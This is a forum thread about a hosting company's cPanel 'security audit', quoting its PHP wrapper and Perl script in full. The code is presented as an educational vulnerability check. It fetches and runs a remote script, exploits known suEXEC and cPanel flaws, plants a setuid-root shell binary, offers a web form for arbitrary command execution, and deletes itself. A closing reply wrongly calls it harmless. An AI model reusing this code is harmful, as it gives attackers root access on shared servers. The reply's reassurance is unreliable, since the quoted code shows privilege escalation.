Has anyone tried this test?

http://www.a-squad.com/audit/

I am not sure I would thrust this

Me too :!: :!:

The code of cpanel.php

<!--
# PROGRAM: cpanel.php
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com
-->

<?php
$tester = "/tmp/tests.pl";
if (!file_exists($tester)) {
$testw = fopen($tester, "w");
ini_set('user_agent',__FILE__);
$testr = fopen("http://206.71.87.80/tests.pl","r");
while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
fclose($testw);
fclose($testr);
}
passthru("perl $tester '$QUERY_STRING' 2>&1");
?>



The code of http://206.71.87.80/tests.pl

#!/usr/bin/perl -w
# PROGRAM: tests.pl
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# USAGE: This script MUST be run from a php script
# in order for the tests to work correctly. (It
# will NOT work to execute this script directly
# from the browser because it's written in Perl.)
# See a-squad.com/audit for the php wrapper code.
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com

use strict;
use CGI ':standard';

if (my $query = shift) {
$ENV{QUERY_STRING} = $query;
$ENV{REQUEST_METHOD}="GET";
}
my $q = new CGI;

my @users = ();
my $me = "";
my $default_command = "id";
my $dummy = "/tmp/tests";

$| = 1;
print start_html("System Check");

my $action = "cpanel.php";
my $secure = 1;
my $locked = 1;
my $common = 0;
my $cpanel = 0;
my $canexe = 0;
my $cpwrap = 0;

print qq{<center><a href=http://www.a-squad.com/audit/><img src=http://www.asquad.com/Abanner.jpg border=0 alt="ADVERTISEMENT: A-Squad Certified Secure cPanel Hosting"></a></center>n};
print "<ol>Performing white box security audit...n";
if (-d "/usr/local/cpanel") {
chomp($cpanel = `/usr/local/cpanel/cpanel -V`);
print "<li><font color=green>PASSED</font>: cPanel INSTALLED ($cpanel)n";
} else {
print "<li><font color=red>FAILED</font>: cPanel NOT INSTALLEDn";
print "<a href=http://www.a-squad.com/audit/explain1.html>Explain</a>n";
}

my $uid = $<;
if ($uid < 500) {
print "<li><font color=red>FAILED</font>: Privileged UID Vulnerability Check ($uid)n";
print "<a href=http://www.a-squad.com/audit/explain2.html>Explain</a>n";
} else {
print "<li><font color=green>PASSED</font>: Privileged UID Vulnerability Check ($uid)n";
}
if (my $nam = getpwuid $uid) {
if ($nam eq "nobody") {
print "<li><font color=red>FAILED</font>: nobody executionn";
print "<a href=http://www.a-squad.com/audit/explain3.html>Explain</a>n";
$secure = 0;
$common = 1;
} else {
print "<li><font color=green>PASSED</font>: User $nam ($uid) is probably not sharedn";
}
} else {
print "<li><font color=green>FAILED</font>: Privileged UID Vulnerability Check ($uid)n";
}

$ENV{PWD} ||= `pwd`; chomp $ENV{PWD};
setpwent;
while (my ($name,$passwd,$uid,$gid,
$quota,$comment,$gcos,$dir) = getpwent) {
if ($uid >= 500) {
push @users, $name;
if ($ENV{PWD} =~ m%^Q$dirE/%) {
$me = $name;
$ENV{HOME} = $dir;
}
}
}

if ($me && $ENV{HOME} &&
-d $ENV{HOME}) {
my $mode = (stat _)[2];
if ($mode & 1) {
print "<li><font color=red>FAILED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]n";
print "<a href=http://www.a-squad.com/audit/explain4.html>Explain</a>n";
$secure = 0;
$locked = 0;
} else {
print "<li><font color=green>PASSED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]n";
}
if ($mode & 4) {
print "<li><font color=red>FAILED</font>: Simple $HOME Scanning [$ENV{HOME}]n";
print "<a href=http://www.a-squad.com/audit/explain5.html>Explain</a>n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Simple $HOME Scanning [$ENV{HOME}]n";
}
if ($mode & 32) {
print "<li><font color=red>FAILED</font>: Group $HOME Scanning [$ENV{HOME}]n";
print "<a href=http://www.a-squad.com/audit/explain6.html>Explain</a>n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Group $HOME Scanning [$ENV{HOME}]n";
}
$mode = (stat "$ENV{HOME}/..")[2];
if ($mode & 4) {
print "<li><font color=red>FAILED</font>: Root /home scanningn";
print "<a href=http://www.a-squad.com/audit/explain11.html>Explain</a>n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Root /home scanningn";
}
$mode = (stat "$ENV{HOME}/public_html")[2];
if (!$locked && $mode & 1) {
print "<li><font color=red>FAILED</font>: Simple WEBROOT Protectionn";
print "<a href=http://www.a-squad.com/audit/explain7.html>Explain</a>n";
} else {
print "<li><font color=green>PASSED</font>: Simple WEBROOT Protectionn";
}
my $pubg = (stat _)[5];
if (($common && !$locked and
$(==$pubg && ($mode & ) or
(!$locked && $mode & 1)) {
print "<li><font color=red>FAILED</font>: Real WEBROOT Protectionn";
print "<a href=http://www.a-squad.com/audit/explain8.html>Explain</a>n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Real WEBROOT Protectionn";
}
} else {
print "<li><font color=red>FAILED</font>: Unable to locate unprivileged homedirn";
}

my $command = $q->param("command") || $default_command;
my $who = $q->param("username") || $me;
if ($cpanel && $common) {
print "<li><font color=green>PASSED</font>: CVE-2004-0490 <code>mod_phpsuexec</code> PATH_TRANSLATED Vulnerability Testn";
if ($command and $who) {
my $wraptest = "/usr/local/cpanel/wrap";
$cpwrap = 1 if -x $wraptest && -u _;
if ($who eq "root") {
print "<li><font color=yellow><b>SKIPPED</b></font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Testn";
print "<a href=http://www.a-squad.com/audit/explain12.html>Explain</a>n";
$canexe = $cpwrap;
} else {
mkdir $dummy, 0755;
chdir $dummy;
symlink("/usr/local/cpanel","cpanel");
my $dir = (getpwnam $who)[7];
open (DUMMY,">SafeFile.pm");
$ENV{HOME} = $dir;
print DUMMY qq{chdir "$dir";warn "n";nexec <<RUN$$;n$commandnRUN$$n};
close DUMMY;
my $out = `/usr/local/apache/bin/suexec $who $who cpanel/bin/proftpdvhosts 2>&1`;
if ($out =~ /^n/) {
print "<li><font color=red><b>FAILED</b></font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Testn";
print "<a href=http://www.a-squad.com/audit/explain12.html>Explain</a>n";
print "<pre>EXEC [$command] as [$who]:n";
$out =~ s/&/&amp;/g;
$out =~ s/</&lt;/g;
print $out,"</pre>n";
$canexe = 1;
} else {
print "<li><font color=green>PASSED</font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Testn";
print "<!--nCOMPILE ERROR?n$out-->n" if $out;
}
}

if ($canexe) {
if (!$cpwrap) {
open (DUMMY,">wrap.c");
print DUMMY qq{int main() { initgroups("root",0);setgid(0);setuid(0);execl("/bin/sh","sh",0); }n};
close DUMMY;
if (my $cc = `cc -o wrap wrap.c 2>&1`) {
print "<!--nCOMPILE ERROR?n$cc-->n";
} else {
open (DUMMY,">SafeFile.pm");
print DUMMY qq{exec q{ cd /usr/local/cpanel;mv bin bin.ROOT;mkdir bin;echo 'install -o root -g wheel -m 04777 $dummy/wrap .' > bin/backupadmin;chmod 755 bin/backupadmin;bin.ROOT/backupwrap;rm bin/backupadmin;rmdir bin;mv bin.ROOT bin };n};
close DUMMY;
my $out = `/usr/local/apache/bin/suexec cpanel cpanel cpanel/bin/proftpdvhosts 2>&1`;
}
}
$cpwrap = 1 if -x $wraptest && -u _;
}
chdir "/";
if ($cpwrap) {
print "<li><font color=red><b>FAILED</b></font>: CAN-2004-0546 cpwrap suid root Vulnerability Testn";
print "<a href=http://www.a-squad.com/audit/explain13.html>Explain</a>n";
push @users, "root";
if ($who eq "root") {
print "<pre>EXEC [$command] as [$who]:n";
$ENV{EXEC} = $command;
my $out = `echo $EXEC | $wraptest 2>&1`;
$out =~ s/&/&amp;/g;
$out =~ s/</&lt;/g;
print $out,"</pre>n";
}
} else {
print "<li><font color=green>PASSED</font>: CAN-2004-0546 cpwrap suid root Vulnerability Testn";
}
system("rm","-rf",$dummy);
}
} elsif ($cpanel && !$common) {
my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php 2>&1`;
if ($probe =~ /phpinfo()/) {
print "<li><font color=red><b>FAILED</b></font>: CVE-2004-0490 <code>mod_phpsuexec</code> PATH_TRANSLATED Vulnerability Testn";
print "<a href=http://www.a-squad.com/audit/explain10.html>Explain</a>n";
$canexe = 1;
$secure = 0;
print "<pre>EXEC [$command] as [$who]:n";
my $out = `$command 2>&1`;
$out =~ s/&/&amp;/g;
$out =~ s/</&lt;/g;
print $out,"</pre>n";
if ($who ne $me) {
print "Submit again to switch to another user...<br>n";
my @guess = qw(/index.php /forum/index.php /forums/index.php);
my $rand = $guess[rand @guess];
$action = "/~$who$rand/~$me/cpanel.php";
system "chmod o+x $ENV{HOME}";
}
} else {
print "<li><font color=green>PASSED</font>: CVE-2004-0490 <code>mod_phpsuexec</code> PATH_TRANSLATED Vulnerability Testn";
}
print "<li><font color=green>PASSED</font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Testn";
print "<li><font color=green>PASSED</font>: CAN-2004-0546 cpwrap suid root Vulnerability Testn";
}
if ($cpanel) {
if ($secure) {
print "<li><font color=green>PASSED</font>: Congratulations, your cPanel configuration is secure!n";
} else {
print "<li><font color=red>FAILED</font>: One or more insecure cPanel configurations were detected. Visit <a href=http://www.a-squad.com/>A-Squad.Com</a> for details on where to find more secure cPanel hosting.n";
}
}
print "</ol>";
print
start_form(-method => "GET",-action => $action,-name=>"f"),
"Username: ",
popup_menu
(-name => "username",
-values => [ sort @users ],
-default => $who,
),
br,
"Password: (not required)",br,
"Command: ",
textfield(-name => "command",-value=> $command),
br,
submit(-value=> "Test Execution"),
end_form,
"n<script>f.command.focus()</script>n"
if $canexe;
print end_html;
-M$0>0.01&&unlink$0;

While I haven't gone through the code with a fine tooth comb... i didn't see anything that obviously jumped out to me as being malicious code. That script is being run as a non priviledged user too... (the webserver or the account of the domain it's run from). It shouldn't be able to do too much.

I think you risk more on the various rootkit scanners out now... those are run from root, with full access to everything, So you'd better trust those authors.